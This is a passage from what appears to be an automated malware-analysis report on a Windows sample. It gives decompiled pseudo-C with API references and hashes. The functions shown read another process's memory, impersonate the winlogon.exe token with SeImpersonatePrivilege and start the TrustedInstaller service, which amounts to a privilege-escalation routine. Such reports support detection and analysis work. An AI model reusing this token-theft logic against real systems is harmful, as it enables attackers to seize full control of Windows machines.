                                                                                                  					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
                                                                                                  					if(_t43 == 0) {
                                                                                                  						_t69 = GetLastError();
                                                                                                  					} else {
                                                                                                  						_t48 = E00405642( &_v564);
                                                                                                  						_t74 = _v548;
                                                                                                  						_t70 = _t48;
                                                                                                  						_a12 = _t74;
                                                                                                  						_v540 = 0;
                                                                                                  						memset( &_v538, 0, 0x1fe);
                                                                                                  						asm("cdq");
                                                                                                  						_push(_t67);
                                                                                                  						_push(_t74);
                                                                                                  						_push(_t70);
                                                                                                  						_push(L"%d  %I64x");
                                                                                                  						_push(0xff);
                                                                                                  						_push( &_v540);
                                                                                                  						L0040B1EC();
                                                                                                  						_v548 = 0;
                                                                                                  						E004055D1( &_v540,  &_v564);
                                                                                                  						_t16 = _t70 + 0xa; // 0xa
                                                                                                  						_t68 = _t16;
                                                                                                  						_v24 = 0;
                                                                                                  						_v12 = 0;
                                                                                                  						_v20 = 0;
                                                                                                  						_v16 = 0x100;
                                                                                                  						_v28 = 0;
                                                                                                  						E0040559A( &_v28, _t16);
                                                                                                  						_t76 = _v12;
                                                                                                  						_t56 = 0x40c4e8;
                                                                                                  						if(_t76 != 0) {
                                                                                                  							_t56 = _t76;
                                                                                                  						}
                                                                                                  						_t26 = _t70 + 2; // 0x2
                                                                                                  						_t66 = _t70 + _t26;
                                                                                                  						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
                                                                                                  						_t85 = _t76;
                                                                                                  						if(_t76 == 0) {
                                                                                                  							_t76 = 0x40c4e8;
                                                                                                  						}
                                                                                                  						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                                  						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
                                                                                                  						_t69 = _t61;
                                                                                                  						E004055D1(_t61,  &_v28);
                                                                                                  					}
                                                                                                  					_t45 = FindCloseChangeNotification(_a16); // executed
                                                                                                  					E004055D1(_t45,  &_v564);
                                                                                                  				}
                                                                                                  				return _t69;
                                                                                                  			}





























                                                                                                  0x00401ac9
                                                                                                  0x00401ad1
                                                                                                  0x00401ae1
                                                                                                  0x00401ae7
                                                                                                  0x00401ae9
                                                                                                  0x00401aec
                                                                                                  0x00401c1b
                                                                                                  0x00401af2
                                                                                                  0x00401af2
                                                                                                  0x00401af8
                                                                                                  0x00401b0c
                                                                                                  0x00401b12
                                                                                                  0x00401b1a
                                                                                                  0x00401bfd
                                                                                                  0x00401b20
                                                                                                  0x00401b26
                                                                                                  0x00401b2b
                                                                                                  0x00401b36
                                                                                                  0x00401b40
                                                                                                  0x00401b43
                                                                                                  0x00401b4a
                                                                                                  0x00401b54
                                                                                                  0x00401b55
                                                                                                  0x00401b56
                                                                                                  0x00401b57
                                                                                                  0x00401b58
                                                                                                  0x00401b63
                                                                                                  0x00401b68
                                                                                                  0x00401b69
                                                                                                  0x00401b77
                                                                                                  0x00401b7d
                                                                                                  0x00401b82
                                                                                                  0x00401b82
                                                                                                  0x00401b88
                                                                                                  0x00401b8b
                                                                                                  0x00401b8e
                                                                                                  0x00401b91
                                                                                                  0x00401b98
                                                                                                  0x00401b9b
                                                                                                  0x00401ba0
                                                                                                  0x00401ba5
                                                                                                  0x00401baa
                                                                                                  0x00401bac
                                                                                                  0x00401bac
                                                                                                  0x00401bb2
                                                                                                  0x00401bb2
                                                                                                  0x00401bbe
                                                                                                  0x00401bc4
                                                                                                  0x00401bc6
                                                                                                  0x00401bc8
                                                                                                  0x00401bc8
                                                                                                  0x00401bd7
                                                                                                  0x00401be6
                                                                                                  0x00401bee
                                                                                                  0x00401bf0
                                                                                                  0x00401bf0
                                                                                                  0x00401c02
                                                                                                  0x00401c0e
                                                                                                  0x00401c0e
                                                                                                  0x00401c23

                                                                                                  APIs
                                                                                                  • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                  • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                  • memset.MSVCRT ref: 00401B4A
                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                  • _snwprintf.MSVCRT ref: 00401B69
                                                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                  • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                                  • String ID: %d %I64x
                                                                                                  • API String ID: 1126726007-2565891505
                                                                                                  • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                  • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                  • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                  • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                                  				int _v8;
                                                                                                  				void _v538;
                                                                                                  				long _v540;
                                                                                                  				void _v1066;
                                                                                                  				char _v1068;
                                                                                                  				long _t30;
                                                                                                  				int _t33;
                                                                                                  				int _t39;
                                                                                                  				void* _t42;
                                                                                                  				void* _t45;
                                                                                                  				long _t49;
                                                                                                  
                                                                                                  				_t45 = __edx;
                                                                                                  				_v540 = 0;
                                                                                                  				memset( &_v538, 0, 0x208);
                                                                                                  				_v1068 = 0;
                                                                                                  				memset( &_v1066, 0, 0x208);
                                                                                                  				E00404C3C( &_v540);
                                                                                                  				_t48 = L"winlogon.exe";
                                                                                                  				_t39 = wcslen(L"winlogon.exe");
                                                                                                  				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                                  				_t53 = _t39 + _t8 - 0x104;
                                                                                                  				_pop(_t42);
                                                                                                  				if(_t39 + _t8 >= 0x104) {
                                                                                                  					_v1068 = 0;
                                                                                                  				} else {
                                                                                                  					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                                  					_pop(_t42);
                                                                                                  				}
                                                                                                  				_v8 = 0;
                                                                                                  				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                                  				_t49 = _t30;
                                                                                                  				_t54 = _t49;
                                                                                                  				if(_t49 == 0) {
                                                                                                  					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                                  					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                                  					if(_t33 == 0) {
                                                                                                  						_t49 = GetLastError();
                                                                                                  					}
                                                                                                  					CloseHandle(_v8);
                                                                                                  				}
                                                                                                  				return _t49;
                                                                                                  			}














                                                                                                  0x00401f04
                                                                                                  0x00401f20
                                                                                                  0x00401f27
                                                                                                  0x00401f38
                                                                                                  0x00401f3f
                                                                                                  0x00401f4e
                                                                                                  0x00401f54
                                                                                                  0x00401f5f
                                                                                                  0x00401f6e
                                                                                                  0x00401f72
                                                                                                  0x00401f77
                                                                                                  0x00401f78
                                                                                                  0x00401f91
                                                                                                  0x00401f7a
                                                                                                  0x00401f88
                                                                                                  0x00401f8e
                                                                                                  0x00401f8e
                                                                                                  0x00401fa6
                                                                                                  0x00401fa9
                                                                                                  0x00401fae
                                                                                                  0x00401fb0
                                                                                                  0x00401fb2
                                                                                                  0x00401fb9
                                                                                                  0x00401fc2
                                                                                                  0x00401fca
                                                                                                  0x00401fd2
                                                                                                  0x00401fd2
                                                                                                  0x00401fd7
                                                                                                  0x00401fd7
                                                                                                  0x00401fe3

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00401F27
                                                                                                  • memset.MSVCRT ref: 00401F3F
                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                  • wcslen.MSVCRT ref: 00401F5A
                                                                                                  • wcslen.MSVCRT ref: 00401F69
                                                                                                  • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                  • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                  • API String ID: 3867304300-2177360481
                                                                                                  • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                  • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                  • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                  • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00401306(void* _a4) {
                                                                                                  				intOrPtr _v28;
                                                                                                  				struct _SERVICE_STATUS _v32;
                                                                                                  				void* _t5;
                                                                                                  				int _t12;
                                                                                                  				void* _t14;
                                                                                                  
                                                                                                  				_t12 = 0; // executed
                                                                                                  				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                                  				_t14 = _t5;
                                                                                                  				if(_t14 != 0) {
                                                                                                  					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                                                  						_t12 = StartServiceW(_t14, 0, 0);
                                                                                                  					}
                                                                                                  					CloseServiceHandle(_t14);
                                                                                                  				}
                                                                                                  				CloseServiceHandle(_a4);
                                                                                                  				return _t12;
                                                                                                  			}








                                                                                                  0x00401319
                                                                                                  0x0040131b
                                                                                                  0x00401327
                                                                                                  0x0040132b
                                                                                                  0x0040133a
                                                                                                  0x0040134b
                                                                                                  0x0040134b
                                                                                                  0x0040134e
                                                                                                  0x0040134e
                                                                                                  0x00401353
                                                                                                  0x0040135b

                                                                                                  APIs
                                                                                                  • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                  • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                  • String ID: TrustedInstaller
                                                                                                  • API String ID: 862991418-565535830
                                                                                                  • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                  • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                  • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                  • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                  				int _t8;
                                                                                                  				struct HINSTANCE__* _t9;
                                                                                                  
                                                                                                  				if( *0x41c8e8 == 0) {
                                                                                                  					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  					if(_t9 != 0) {
                                                                                                  						 *0x41c8e8 = 1;
                                                                                                  						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                  					}
                                                                                                  				}
                                                                                                  				if( *0x41c8ec == 0) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                  					return _t8;
                                                                                                  				}
                                                                                                  			}





                                                                                                  0x0040955f
                                                                                                  0x00409566
                                                                                                  0x0040956e
                                                                                                  0x00409576
                                                                                                  0x00409586
                                                                                                  0x00409586
                                                                                                  0x0040956e
                                                                                                  0x00409592
                                                                                                  0x004095aa
                                                                                                  0x00409594
                                                                                                  0x004095a3
                                                                                                  0x004095a6
                                                                                                  0x004095a6

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                  • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                  • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                  • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                  • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                  • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                  				struct HRSRC__* _t12;
                                                                                                  				void* _t16;
                                                                                                  				void* _t17;
                                                                                                  				signed int _t18;
                                                                                                  				signed int _t26;
                                                                                                  				signed int _t29;
                                                                                                  				signed int _t33;
                                                                                                  				struct HRSRC__* _t35;
                                                                                                  				signed int _t36;
                                                                                                  
                                                                                                  				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                  				_t35 = _t12;
                                                                                                  				if(_t35 != 0) {
                                                                                                  					_t33 = SizeofResource(_a4, _t35);
                                                                                                  					if(_t33 > 0) {
                                                                                                  						_t16 = LoadResource(_a4, _t35);
                                                                                                  						if(_t16 != 0) {
                                                                                                  							_t17 = LockResource(_t16);
                                                                                                  							if(_t17 != 0) {
                                                                                                  								_a4 = _t33;
                                                                                                  								_t29 = _t33 * _t33;
                                                                                                  								_t36 = 0;
                                                                                                  								_t7 =  &_a4;
                                                                                                  								 *_t7 = _a4 >> 2;
                                                                                                  								if( *_t7 != 0) {
                                                                                                  									do {
                                                                                                  										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                  										_t36 = _t36 + 1;
                                                                                                  										_t29 = _t26;
                                                                                                  									} while (_t36 < _a4);
                                                                                                  								}
                                                                                                  								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                                  								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return 1;
                                                                                                  			}












                                                                                                  0x0040a348
                                                                                                  0x0040a34e
                                                                                                  0x0040a352
                                                                                                  0x0040a35f
                                                                                                  0x0040a363
                                                                                                  0x0040a369
                                                                                                  0x0040a371
                                                                                                  0x0040a374
                                                                                                  0x0040a37c
                                                                                                  0x0040a380
                                                                                                  0x0040a383
                                                                                                  0x0040a386
                                                                                                  0x0040a388
                                                                                                  0x0040a388
                                                                                                  0x0040a38c
                                                                                                  0x0040a38f
                                                                                                  0x0040a39f
                                                                                                  0x0040a3a1
                                                                                                  0x0040a3a5
                                                                                                  0x0040a3a5
                                                                                                  0x0040a3a9
                                                                                                  0x0040a3aa
                                                                                                  0x0040a3b3
                                                                                                  0x0040a3b3
                                                                                                  0x0040a37c
                                                                                                  0x0040a371
                                                                                                  0x0040a3b8
                                                                                                  0x0040a3be

                                                                                                  APIs
                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                  • String ID:
                                                                                                  • API String ID: 3473537107-0
                                                                                                  • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                  • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                  • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                  • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                  				void* _t8;
                                                                                                  				void* _t13;
                                                                                                  				signed int _t16;
                                                                                                  				void** _t21;
                                                                                                  				signed int _t22;
                                                                                                  
                                                                                                  				_t21 = __edi;
                                                                                                  				_t22 =  *__eax;
                                                                                                  				if(__edx < _t22) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					_t13 =  *__edi;
                                                                                                  					do {
                                                                                                  						_t1 =  &_a8; // 0x4057e1
                                                                                                  						 *__eax =  *__eax +  *_t1;
                                                                                                  						_t16 =  *__eax;
                                                                                                  					} while (__edx >= _t16);
                                                                                                  					_t8 = malloc(_t16 * _a4); // executed
                                                                                                  					 *__edi = _t8;
                                                                                                  					if(_t22 > 0) {
                                                                                                  						if(_t8 != 0) {
                                                                                                  							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                  						}
                                                                                                  						free(_t13); // executed
                                                                                                  					}
                                                                                                  					return 0 |  *_t21 != 0x00000000;
                                                                                                  				}
                                                                                                  			}








                                                                                                  0x00404951
                                                                                                  0x00404952
                                                                                                  0x00404956
                                                                                                  0x004049a1
                                                                                                  0x00404958
                                                                                                  0x00404959
                                                                                                  0x0040495b
                                                                                                  0x0040495b
                                                                                                  0x0040495f
                                                                                                  0x00404961
                                                                                                  0x00404963
                                                                                                  0x0040496d
                                                                                                  0x00404975
                                                                                                  0x00404977
                                                                                                  0x0040497b
                                                                                                  0x00404985
                                                                                                  0x0040498a
                                                                                                  0x0040498e
                                                                                                  0x00404993
                                                                                                  0x0040499d
                                                                                                  0x0040499d

                                                                                                  APIs
                                                                                                  • malloc.MSVCRT ref: 0040496D
                                                                                                  • memcpy.MSVCRT ref: 00404985
                                                                                                  • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: freemallocmemcpy
                                                                                                  • String ID: W@
                                                                                                  • API String ID: 3056473165-1729568415
                                                                                                  • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                  • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                  • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                  • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405436(wchar_t* _a4) {
                                                                                                  				void _v2050;
                                                                                                  				signed short _v2052;
                                                                                                  				void* __esi;
                                                                                                  				struct HINSTANCE__* _t16;
                                                                                                  				WCHAR* _t18;
                                                                                                  
                                                                                                  				_v2052 = _v2052 & 0x00000000;
                                                                                                  				memset( &_v2050, 0, 0x7fe);
                                                                                                  				E00404C3C( &_v2052);
                                                                                                  				_t18 =  &_v2052;
                                                                                                  				E004047AF(_t18);
                                                                                                  				wcscat(_t18, _a4);
                                                                                                  				_t16 = LoadLibraryW(_t18); // executed
                                                                                                  				if(_t16 == 0) {
                                                                                                  					return LoadLibraryW(_a4);
                                                                                                  				}
                                                                                                  				return _t16;
                                                                                                  			}








                                                                                                  0x0040543f
                                                                                                  0x00405456
                                                                                                  0x00405462
                                                                                                  0x00405467
                                                                                                  0x0040546d
                                                                                                  0x00405478
                                                                                                  0x00405489
                                                                                                  0x0040548d
                                                                                                  0x00000000
                                                                                                  0x00405492
                                                                                                  0x00405496

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                    • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                    • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                  • wcscat.MSVCRT ref: 00405478
                                                                                                  • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3725422290-0
                                                                                                  • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                  • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                  • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                  • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				signed int _v16;
                                                                                                  				signed int _v20;
                                                                                                  				signed int _v24;
                                                                                                  				signed short* _v28;
                                                                                                  				signed int _v32;
                                                                                                  				signed int _v36;
                                                                                                  				intOrPtr _v40;
                                                                                                  				signed int _v44;
                                                                                                  				signed int _v48;
                                                                                                  				char _v52;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				signed short* _t68;
                                                                                                  				signed short _t72;
                                                                                                  				intOrPtr _t80;
                                                                                                  				void* _t82;
                                                                                                  				void* _t85;
                                                                                                  				intOrPtr _t90;
                                                                                                  				signed int _t101;
                                                                                                  				intOrPtr _t102;
                                                                                                  				void** _t104;
                                                                                                  				signed short* _t106;
                                                                                                  				signed int* _t107;
                                                                                                  				signed int _t110;
                                                                                                  
                                                                                                  				_t94 = __ecx;
                                                                                                  				_t101 = 0;
                                                                                                  				_v32 = 0x22;
                                                                                                  				_v16 = 0;
                                                                                                  				_v20 = 0;
                                                                                                  				_v12 = 0;
                                                                                                  				_v24 = 1;
                                                                                                  				_v8 = 0;
                                                                                                  				_v48 = 0;
                                                                                                  				_v36 = 0;
                                                                                                  				_v44 = 0;
                                                                                                  				_v40 = 0x100;
                                                                                                  				_v52 = 0;
                                                                                                  				_t68 = E004054B9(_a4);
                                                                                                  				_t106 = _a8;
                                                                                                  				if( *_t106 == 0) {
                                                                                                  					L31:
                                                                                                  					_t107 = _a4;
                                                                                                  					L32:
                                                                                                  					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
                                                                                                  					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
                                                                                                  					E004055D1(_t68,  &_v52);
                                                                                                  					return _t102;
                                                                                                  				}
                                                                                                  				_v28 = _t106;
                                                                                                  				do {
                                                                                                  					_t72 =  *_v28 & 0x0000ffff;
                                                                                                  					if(_t72 != 0x20 || _v8 != 0) {
                                                                                                  						if(_t72 == 0x22 || _t72 == 0x27) {
                                                                                                  							if(_v8 != 0) {
                                                                                                  								if(_t72 != _v32) {
                                                                                                  									goto L14;
                                                                                                  								}
                                                                                                  								_v8 = _v8 ^ 0x00000001;
                                                                                                  								goto L25;
                                                                                                  							}
